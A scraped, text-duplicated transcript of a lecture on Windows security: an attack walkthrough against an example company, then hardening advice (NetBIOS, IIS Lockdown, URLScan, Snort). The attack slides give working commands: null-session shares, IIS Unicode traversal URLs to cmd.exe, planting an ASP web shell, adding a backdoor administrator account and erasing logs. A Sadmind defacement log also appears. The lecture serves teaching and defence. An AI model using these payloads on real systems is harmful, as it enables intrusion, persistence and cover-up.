windows security analysis computer science e-commerce security matthew cook escarpment
Post on 14-Jan-2016
59 Views
Preview:
DESCRIPTION
TRANSCRIPT
Slide 1
1
Windows Security AnalysisComputer Science E-Commerce Security
Matthew Cookhttp://escarpment.net/
Slide 2
2
IntroductionIntroduction
Loughborough UniversityLoughborough Universityhttp://www.lboro.ac.uk/computing/http://www.lboro.ac.uk/computing/
Janet Web Cache ServiceJanet Web Cache Servicehttp://wwwcache.ja.net/http://wwwcache.ja.net/
Slide 3
3
Windows Security AnalysisWindows Security Analysis
IntroductionIntroduction Step-by-step Machine CompromiseStep-by-step Machine Compromise Preventing AttackPreventing Attack Further ReadingFurther Reading The FutureThe Future
Slide 4
4
IntroductionIntroduction
Physical SecurityPhysical Security Security ThreatsSecurity Threats ““Hacker” or “Cracker”Hacker” or “Cracker” The Easiest Security ImprovementThe Easiest Security Improvement Can you buy security?Can you buy security?
Slide 5
5
Physical SecurityPhysical Security
Secure LocationSecure Location BIOS restrictionsBIOS restrictions Password ProtectionPassword Protection Boot DevicesBoot Devices Case LocksCase Locks Case PanelsCase Panels
Slide 6
6
Security ThreatsSecurity Threats
Denial of ServiceDenial of Service Theft of informationTheft of information ModificationModification Fabrication (Spoofing or Masquerading)Fabrication (Spoofing or Masquerading)
Slide 7
7
Security Threats…Security Threats…
Why a compromise can occur:Why a compromise can occur: Physical Security HolesPhysical Security Holes Software Security HolesSoftware Security Holes Incompatible Usage Security HolesIncompatible Usage Security Holes Social EngineeringSocial Engineering ComplacencyComplacency
Slide 8
8
““Hacker” or “Cracker”Hacker” or “Cracker”
““Hacker” used primarily by the media to Hacker” used primarily by the media to describe malicious attacks by individualsdescribe malicious attacks by individuals
However the computing community uses However the computing community uses “Cracker” to mean the same“Cracker” to mean the same
A “Hacker” tinkers with systems for good A “Hacker” tinkers with systems for good purposes. (Not breaking the law)purposes. (Not breaking the law)
To avoid confusion many people now sayTo avoid confusion many people now say“A machine has been compromised!”“A machine has been compromised!”Not “A machine has been hacked!”Not “A machine has been hacked!”
Slide 9
9
The Easiest Security ImprovementThe Easiest Security Improvement
Good passwordsGood passwords Usernames and Passwords are the primary Usernames and Passwords are the primary
security defencesecurity defence
Use a password that is easy to type to avoid Use a password that is easy to type to avoid ‘Shoulder Surfers’‘Shoulder Surfers’
Use the first letters from song titles, song Use the first letters from song titles, song lyrics or film quotationslyrics or film quotations
Slide 10
10
Can you buy Security?Can you buy Security?
““This system is secure.”This system is secure.” A product vendor A product vendor might say: might say: “This product makes your “This product makes your network secure.”network secure.” Or: Or: “We secure e-“We secure e-commerce.”commerce.” Inevitably, these claims are Inevitably, these claims are naïve and simplistic. They look at the naïve and simplistic. They look at the security of the product, rather than the security of the product, rather than the security of the system. The first questions to security of the system. The first questions to ask are: ask are: “Secure from whom?”“Secure from whom?” and and “Secure against what?”“Secure against what?”
Bruce SchneierBruce Schneier
Slide 11
11
Step-by-step Machine CompromiseStep-by-step Machine Compromise
BackgroundBackground Gathering InformationGathering Information Identifying System WeaknessIdentifying System Weakness Exploiting the Security HoleExploiting the Security Hole Gaining ‘Root’Gaining ‘Root’ Backdoor AccessBackdoor Access System AlterationSystem Alteration Audit Trail RemovalAudit Trail Removal
Slide 12
12
BackgroundBackground
Reasons for Attack:Reasons for Attack:
Personal IssuesPersonal Issues Political StatementPolitical Statement Financial Gain (Theft of money, information)Financial Gain (Theft of money, information) Learning ExperienceLearning Experience DoS (Denial of Service)DoS (Denial of Service) Support for Illegal ActivitySupport for Illegal Activity
In our scenario we are going to attack the In our scenario we are going to attack the company laggyband.comcompany laggyband.com
Slide 13
13
Gathering InformationGathering Information
Companies HouseCompanies House Internet SearchInternet Search
URL: URL: http://www.google.co.ukhttp://www.google.co.uk WhoisWhois
URL: URL: http://www.netsol.com/cgi-bin/whois/whoishttp://www.netsol.com/cgi-bin/whois/whois A Whois query can provide:A Whois query can provide:
– The RegistrantThe Registrant– The Domain Names RegisteredThe Domain Names Registered– The Administrative, Technical and Billing ContactThe Administrative, Technical and Billing Contact– Record updated and created date stampsRecord updated and created date stamps– DNS Servers for the DomainDNS Servers for the Domain
Slide 14
14
Gathering Information…Gathering Information…
Use Nslookup or digUse Nslookup or dig dig @dns.laggyband.com www.laggyband.comdig @dns.laggyband.com www.laggyband.com Different query type available:Different query type available:
– A – Network addressA – Network address– Any – All or Any Information availableAny – All or Any Information available– Mx – Mail exchange recordsMx – Mail exchange records– Soa – Zone of AuthoritySoa – Zone of Authority– Hinfo – Host informationHinfo – Host information– Axfr – Zone TransferAxfr – Zone Transfer– Txt – Additional stringsTxt – Additional strings
Slide 15
15
Identifying System WeaknessIdentifying System Weakness
Many products available:Many products available: NmapNmap NessusNessus
PandoraPandora PwdumpPwdump L0pht CrackL0pht Crack Null AuthenticationNull Authentication
Slide 16
16
NmapNmap
Port Scanning ToolPort Scanning Tool Stealth scanning, OS FingerprintingStealth scanning, OS Fingerprinting Open SourceOpen Source Runs under Unix based OSRuns under Unix based OS Port development for Win32Port development for Win32 URL: URL: http://www.insure.org/nmap/http://www.insure.org/nmap/
Slide 17
17
NmapNmap
Slide 18
18
NessusNessus
Remote security scanner similar to TyphonRemote security scanner similar to Typhon Very comprehensiveVery comprehensive Frequently updated modulesFrequently updated modules Testing of DoS attacksTesting of DoS attacks Open SourceOpen Source Win32 and Java ClientWin32 and Java Client URL: URL: http://nessus.org/http://nessus.org/
Slide 19
19
PandoraPandora
Not strictly Windows SecurityNot strictly Windows Security Runs on either Unix or Win32Runs on either Unix or Win32 Excellent tool to evaluate Netware securityExcellent tool to evaluate Netware security Open SourceOpen Source Lots of additional informationLots of additional information URL: URL: http://www.nmrc.org/pandora/http://www.nmrc.org/pandora/
Slide 20
20
pwdumppwdump
Version 3 (e = encrypted)Version 3 (e = encrypted) Developed by Phil Staubs and Erik Developed by Phil Staubs and Erik
HjelmstadHjelmstad Based on pwdump and pwdump2Based on pwdump and pwdump2 URL: URL: http://www.ebiz-tech.com/html/pwdump.htmlhttp://www.ebiz-tech.com/html/pwdump.html Needs Administrative PrivilidgesNeeds Administrative Privilidges Extracts hashs even if syskey is installedExtracts hashs even if syskey is installed Extract from remote machinesExtract from remote machines Identifies accounts with no passwordIdentifies accounts with no password Self contained utilitySelf contained utility
Slide 21
21
L0pht CrackL0pht Crack
Password Auditing and RecoveryPassword Auditing and Recovery Crack Passwords from many sourcesCrack Passwords from many sources Registration $249Registration $249 URL: URL: http://www.atstake.com/research/lc3/http://www.atstake.com/research/lc3/
Slide 22
22
L0pht CrackL0pht Crack
Crack Passwords from:Crack Passwords from: Local MachineLocal Machine Remote MachineRemote Machine SAM FileSAM File SMB SnifferSMB Sniffer PWDump filePWDump file
Slide 23
23
Nmap AnalysisNmap Analysis
nmap –sP 158.125.0.0/16nmap –sP 158.125.0.0/16 Dependant on ICMP (Internet Control Dependant on ICMP (Internet Control
Message Protocol)Message Protocol) nmap –sP –PT80 158.125.0.0/16nmap –sP –PT80 158.125.0.0/16 Dependant on TCP SYN/ACK packetDependant on TCP SYN/ACK packet
Slide 24
24
Nmap Analysis…Nmap Analysis…
TCP Connect ScanTCP Connect Scan Completes a ‘Three Way Handshake’Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)Very noisy (Detection by IDS)
Slide 25
25
Nmap Analysis…Nmap Analysis…
TCP SYN ScanTCP SYN Scan Half open scanning (Full port TCP Half open scanning (Full port TCP
connection not made)connection not made) Less noisy than the TCP Connect ScanLess noisy than the TCP Connect Scan
Slide 26
26
Nmap Analysis…Nmap Analysis…
TCP FIN ScanTCP FIN Scan– FIN Packet sent to target portFIN Packet sent to target port– RST returned for all closed portsRST returned for all closed ports– Mostly works UNIX based TCP/IP StacksMostly works UNIX based TCP/IP Stacks
TCP Xmas Tree ScanTCP Xmas Tree Scan– Sends a FIN, URG and PUSH packetSends a FIN, URG and PUSH packet– RST returned for all closed portsRST returned for all closed ports
TCP Null ScanTCP Null Scan– Turns off all flagsTurns off all flags– RST returned for all closed portsRST returned for all closed ports
UDP ScanUDP Scan– UDP Packet sent to target portUDP Packet sent to target port– ““ICMP Port Unreachable” for closed portsICMP Port Unreachable” for closed ports
Slide 27
27
Null AuthenticationNull Authentication
Null Authentication:Null Authentication: Net use Net use \\camford\IPC$\\camford\IPC$ “” /u:“” “” /u:“” Famous tools like ‘Red Button’Famous tools like ‘Red Button’ Net view Net view \\camford\\camford
List of Users, groups and sharesList of Users, groups and shares Last logged on dateLast logged on date Last password changeLast password change Much more…Much more…
Slide 28
28
Exploiting the Security HoleExploiting the Security Hole
Using IIS Unicode/Directory TraversalUsing IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir/scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browserDisplays the listing of c: in browser
Copy cmd.exe to /scripts/root.exeCopy cmd.exe to /scripts/root.exe Echo upload.aspEcho upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.aspGET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.aspUpload cmdasp.asp using upload.asp
Still vulnerable on 24% of E-Commerce serversStill vulnerable on 24% of E-Commerce servers
Slide 29
29
Gaining ‘Root’Gaining ‘Root’
Cmdasp.asp provides a cmd shell in the Cmdasp.asp provides a cmd shell in the SYSTEM contextSYSTEM context
Increase in privileges is now simpleIncrease in privileges is now simple
ISAPI.dll – RevertToSelf (Horovitz)ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by FoundstoneVersion 2 coded by Foundstone http://camford/scripts/idq.http://camford/scripts/idq.dlldll? ? Patch Bulletin: MS01-26Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2NOT included in Windows 2000 SP2
Slide 30
30
Backdoor AccessBackdoor Access
Create several user accountsCreate several user accounts Net user iisservice <pass> /ADDNet user iisservice <pass> /ADD Net localgroup administrators iisservice /ADDNet localgroup administrators iisservice /ADD Add root shells on high end portsAdd root shells on high end ports Tiri is 3Kb in sizeTiri is 3Kb in size Add backdoors to ‘Run’ registry keys Add backdoors to ‘Run’ registry keys
Slide 31
31
System AlterationSystem Alteration
Web page alterationWeb page alteration Information TheftInformation Theft Enable servicesEnable services Add VNCAdd VNC
Creating a Warez ServerCreating a Warez Server Net start msftpsvcNet start msftpsvc Check accessCheck access Upload file 1Mb in sizeUpload file 1Mb in size Advertise as a warez server Advertise as a warez server
Slide 32
32
Audit Trail RemovalAudit Trail Removal
Many machines have auditing disabledMany machines have auditing disabled Main problems are IIS logsMain problems are IIS logs DoS IIS before logs sync to discDoS IIS before logs sync to disc Erase logs from hard discErase logs from hard disc Erasing Eventlog harderErasing Eventlog harder
IDS SystemsIDS Systems Network Monitoring at firewallNetwork Monitoring at firewall
Slide 33
33
Preventing AttackPreventing Attack
NetBIOS/SMB ServicesNetBIOS/SMB Services Hfnetchk and QchainHfnetchk and Qchain SNMP VulnerabilitiesSNMP Vulnerabilities Active Directory VulnerabilitiesActive Directory Vulnerabilities IPSecIPSec IIS SecurityIIS Security IDS – SnortIDS – Snort .NET Server.NET Server
Slide 34
34
NetBIOS/SMB ServicesNetBIOS/SMB Services
NetBIOS Browsing Request [UDP 137]NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138]NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135]NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445]CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 onlyPort 445 Windows 2000 only Block ports at firewallBlock ports at firewall Netstat -ANetstat -A
Slide 35
35
NetBIOS/SMB Services…NetBIOS/SMB Services…
To disable NetBIOSTo disable NetBIOS1.1. Select ‘Disable NetBIOS’ in the WINS tab Select ‘Disable NetBIOS’ in the WINS tab
of advanced TCP/IP properties.of advanced TCP/IP properties.2.2. Deselect ‘File and Print sharing’ in the Deselect ‘File and Print sharing’ in the
advanced settings of the ‘Network and Dial-advanced settings of the ‘Network and Dial-up connections’ windowup connections’ window
Slide 36
36
NetBIOS/SMB Services…NetBIOS/SMB Services…
Disable Null AuthenticationDisable Null Authentication Key similar to Windows NT 4.0Key similar to Windows NT 4.0 HKLM\SYSTEM\CurrentControlSet\Control\LSA\HKLM\SYSTEM\CurrentControlSet\Control\LSA\
RestrictAnonymousRestrictAnonymous REG_DWORD set to 0, 1 or REG_DWORD set to 0, 1 or 2!2! HKLM\SYSTEM\CurrentControlSet\Control\HKLM\SYSTEM\CurrentControlSet\Control\
SecurePipeServers\RestrictAnonymousSecurePipeServers\RestrictAnonymous REG_DWORD set to 0 or 1REG_DWORD set to 0 or 1
Slide 37
37
HfnetchkHfnetchk
Use Hfnetchk to check hot fixesUse Hfnetchk to check hot fixes Checks machines against Microsoft XMLChecks machines against Microsoft XML Automate the process using a batch files and Automate the process using a batch files and
a mail client (Postie)a mail client (Postie) URL: URL: http://www.infradig.com/infradig/postie/http://www.infradig.com/infradig/postie/ Use QChain to chain hot fixes together Use QChain to chain hot fixes together
without rebooting in-between.without rebooting in-between.
Slide 38
38
Hfnetchk…Hfnetchk…
Patch details for:Patch details for: Windows NT 4.0, 2000, XP, .NET serverWindows NT 4.0, 2000, XP, .NET server IIS 4, IIS 5 and IIS 6IIS 4, IIS 5 and IIS 6 SQL Server 7.0SQL Server 7.0 SQL Server 2000SQL Server 2000 Internet Explorer 5.01 (and later)Internet Explorer 5.01 (and later)
Slide 39
39
Hfnetchk…Hfnetchk…
Default scan of local host (Pre downloaded)Default scan of local host (Pre downloaded)hfnetchk –x mssecure.xmlhfnetchk –x mssecure.xml
Default scan of lboro domainDefault scan of lboro domainhfnetchk –d lborohfnetchk –d lboro
Verbose scan of local hostVerbose scan of local hosthfnetchk –v –x mssecure.xmlhfnetchk –v –x mssecure.xml
Verbose scan including installed hot fixesVerbose scan including installed hot fixeshfnetchk –v –a b –x mssecure.xmlhfnetchk –v –a b –x mssecure.xml
Slide 40
40
SNMP VulnerabilitiesSNMP Vulnerabilities
Simple Network Management ProtocolSimple Network Management Protocol Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25 SNMP Utilities in Resource KitSNMP Utilities in Resource Kit Turn off SNMP servicesTurn off SNMP services Set community namesSet community names Set accepted hostsSet accepted hosts
Slide 41
41
SNMP Vulnerabilities…SNMP Vulnerabilities…
Slide 42
42
SNMP Vulnerabilities…SNMP Vulnerabilities…
CERT Advisory “Tuesday 12CERT Advisory “Tuesday 12thth February” February” Privilege Escalation, DoS, InstabilityPrivilege Escalation, DoS, Instability Block UDP 161 and 162 at firewallBlock UDP 161 and 162 at firewall Patch or disable SNMPPatch or disable SNMP Patches available for Windows 2000 and XPPatches available for Windows 2000 and XP URL: URL:
http://www.microsoft.com/technet/treeview/default.ahttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.aspsp?url=/technet/security/bulletin/ms02-006.asp
Slide 43
43
AD VulnerabilitiesAD Vulnerabilities
Listing of AD contents using ldp.exeListing of AD contents using ldp.exe Ldp is contained on the Resource KitLdp is contained on the Resource Kit Authenticated connection neededAuthenticated connection needed Filter TCP 389 (LDAP) and 3268 (GC)Filter TCP 389 (LDAP) and 3268 (GC) DNS – Securing Zone Transfers to Slave DNS – Securing Zone Transfers to Slave
Name servers onlyName servers only
Slide 44
44
IPSecIPSec
IP securityIP security Linux Connectivity using FreeS/WANLinux Connectivity using FreeS/WAN Mainly for wireless useMainly for wireless use WEP encryption crackedWEP encryption cracked URL: URL: http://www.freeswan.org/http://www.freeswan.org/ URL: URL: http://airsnort.sourceforge.net/http://airsnort.sourceforge.net/
Slide 45
45
IIS SecurityIIS Security
HistoryHistory Recent WormsRecent Worms IIS Lock Down ToolIIS Lock Down Tool URL ScanURL Scan The FutureThe Future
Slide 46
46
IIS HistoryIIS History
IIS 2.0 Installed by NT 4.0IIS 2.0 Installed by NT 4.0 IIS 3.0 followed by more common IIS 4.0IIS 3.0 followed by more common IIS 4.0 Quickly gained reputation for (in)securityQuickly gained reputation for (in)security IIS 5.0 Installed by Windows 2000IIS 5.0 Installed by Windows 2000 IIS 6.0 Installed by .NET ServerIIS 6.0 Installed by .NET Server Microsoft releases HfnetchkMicrosoft releases Hfnetchk Closely followed by IIS Lockdown and Closely followed by IIS Lockdown and
URLScanURLScan
Slide 47
47
Recent WormsRecent Worms
Sadmind/IISSadmind/IISDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)
CodeRedCodeRedida/idq buffer overflowida/idq buffer overflow
CodeGreenCodeGreen ida/idq buffer overflow ida/idq buffer overflow
NimdaNimdaDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)
Slide 48
48
Sadmind/IISSadmind/IIS
2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22centerfont^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>../wwwroot/default.htm 200 -html^>>../wwwroot/default.htm 200 -
Slide 49
49
IIS Lock Down ToolIIS Lock Down Tool
Automatic ‘Lock Down’ [Now 2Automatic ‘Lock Down’ [Now 2ndnd version] version] Locks down IIS 4.0 and IIS 5.0Locks down IIS 4.0 and IIS 5.0 Express ‘lock down’ for simple web sitesExpress ‘lock down’ for simple web sites Custom ‘lock down’ for more complex serversCustom ‘lock down’ for more complex servers Undo facility to reverse last ‘lock down’Undo facility to reverse last ‘lock down’ URL: URL: http://www.microsoft.com/Downloads\http://www.microsoft.com/Downloads\
Release.asp?ReleaseID=32362Release.asp?ReleaseID=32362
Slide 50
50
IIS Lock Down Tool…IIS Lock Down Tool…
Disable:Disable: Active Server PagesActive Server Pages Index Server InterfaceIndex Server Interface Server Side IncludesServer Side Includes Internet Data Internet Data
ConnectorConnector Internet PrintingInternet Printing HTR ScriptingHTR Scripting
Remove:Remove: Sample Web FilesSample Web Files Script Virtual Script Virtual
DirectoryDirectory MSADC DirectoryMSADC Directory WebDAVWebDAVSet Permissions on:Set Permissions on: Exe filesExe files Content DirectoriesContent Directories
Slide 51
51
URL ScanURL Scan
ISAPI filter scans incoming HTTP requestsISAPI filter scans incoming HTTP requests Filtered based on rule setFiltered based on rule set New rules easily addedNew rules easily added Default urlscan.ini suitable for static pagesDefault urlscan.ini suitable for static pages Restart service when changes madeRestart service when changes made 404 and logged request for matched rules404 and logged request for matched rules URL: URL: http://www.microsoft.com/Downloads\http://www.microsoft.com/Downloads\
Release.asp?ReleaseID=32571Release.asp?ReleaseID=32571
Slide 52
52
URL Scan…URL Scan…
Filter on:Filter on: The request method (verb)The request method (verb) File ExtensionFile Extension URL EncodingURL Encoding Non ASCII charactersNon ASCII characters Malicious character sequenceMalicious character sequence Headers in HTTP GETHeaders in HTTP GET
Slide 53
53
The FutureThe Future
Gartner report recommends ditching IISGartner report recommends ditching IIS Rewrite of IIS on the cards for version 6Rewrite of IIS on the cards for version 6 Lock Down Tool (Interim Measures)Lock Down Tool (Interim Measures) Httpd functionality in the kernel (TechEd)Httpd functionality in the kernel (TechEd) IIS Lockdown included in SP3IIS Lockdown included in SP3 Further implications for .NETFurther implications for .NET
Slide 54
54
IDS SnortIDS Snort
IDS – Intrusion Detection SystemIDS – Intrusion Detection System Libpcap packet sniffer and loggerLibpcap packet sniffer and logger Originally developed for the Unix platformsOriginally developed for the Unix platforms Open SourceOpen Source Port to Win32 available (Release 1.8.1)Port to Win32 available (Release 1.8.1) Installation on Win32 in under 30 minutesInstallation on Win32 in under 30 minutes Run on your IIS server or standaloneRun on your IIS server or standalone
Slide 55
55
IDS Snort…IDS Snort…
Snort can detect:Snort can detect: Stealth Port ScansStealth Port Scans CGI AttacksCGI Attacks Front Page Extensions AttacksFront Page Extensions Attacks ICMP ActivityICMP Activity SMTP ActivitySMTP Activity SQL ActivitySQL Activity SMB ProbesSMB Probes
Slide 56
56
IDS Snort…IDS Snort…
Default logging to snort\logs\alert.idsDefault logging to snort\logs\alert.ids Log to mySQL and SQL ServerLog to mySQL and SQL Server Notification as logs, ‘winpopup’, email etcNotification as logs, ‘winpopup’, email etc SnortSnaf or ACID (PHP Based)SnortSnaf or ACID (PHP Based) GUI – IDS CenterGUI – IDS Center URL: URL: http://snort.sourcefire.com/http://snort.sourcefire.com/ URL: URL: http://www.cert.org/kb/acid/http://www.cert.org/kb/acid/ URL: URL: http://www.silicondefense.com/http://www.silicondefense.com/
Slide 57
57
Snort…Snort…
Slide 58
58
.NET Server.NET Server
Slide 59
59
.NET Server….NET Server…
Web Web ServerServer
StandardStandardServerServer
EnterpriseEnterpriseServerServer
DatacenterDatacenterServerServer
RAMRAM 2Gb2Gb 4Gb4Gb 64Gb64Gb 128Gb128Gb
CPUCPU 22 22 88 3232
ClusterCluster N/AN/A N/AN/A 4 node4 node 8 node8 node
64-bit64-bit N/AN/A N/AN/A YesYes YesYes
NotesNotes WWWWWW SOHOSOHO Large SiteLarge Site OEM OnlyOEM Only
Slide 60
60
.NET Server….NET Server…
Mainly improvements in AD and ManagementMainly improvements in AD and Management Blank passwords at console onlyBlank passwords at console only Improved command line toolsImproved command line tools Evaluating Security on build 3590Evaluating Security on build 3590 IIS Currently secure from installIIS Currently secure from install Auditing enabled by defaultAuditing enabled by default Integrated change logIntegrated change log XML OutputXML Output
Slide 61
61
.NET Server….NET Server…
Slide 62
62
.NET Server….NET Server…
Slide 63
63
.NET Server….NET Server…
Slide 64
64
.NET Server….NET Server…
Slide 65
65
.NET Server….NET Server…
Slide 66
66
Further ReadingFurther Reading
Schneier, B Schneier, B Secrets & Lies (Digital Secrets & Lies (Digital Security in a Networked World) [ISBN Security in a Networked World) [ISBN 0471253111]0471253111]
Hacking Exposed Series McGraw HillHacking Exposed Series McGraw Hill
Security FocusSecurity Focus BugtraqBugtraq
GoogleGoogle
Slide 67
67
QuestionsQuestions
top related